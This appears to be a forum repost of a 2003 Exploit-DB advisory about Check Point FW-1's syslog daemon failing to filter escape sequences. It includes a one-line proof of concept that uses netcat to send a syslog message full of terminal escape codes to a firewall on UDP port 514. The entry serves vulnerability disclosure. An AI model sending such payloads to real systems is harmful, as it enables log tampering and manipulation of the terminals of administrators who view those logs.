Exploit Check Point FW-1 Syslog Daemon - Unfiltered Escape Sequence

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22394
Проверка EDB
  1. Пройдено
Автор
DR. PETER BIERINGER
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
N/A
Дата публикации
2003-03-21
Код:
source: https://www.securityfocus.com/bid/7161/info

An issue has been discovered in Check Point FW-1 syslog daemon when attempting to process a malicious, remotely supplied, syslog message. Specifically, some messages containing escape sequences are not properly filtered out. This may result in unpredictable behaviour by the Check Point syslog daemon.

The technical details regarding this issue are currently unknown. This BID will be updated when further information becomes available.

[attacker]# echo -e "<189>19: 00:01:04:
Test\a\033[2J\033[2;5m\033[1;31mHACKER~
ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
 
Источник
www.exploit-db.com

Похожие темы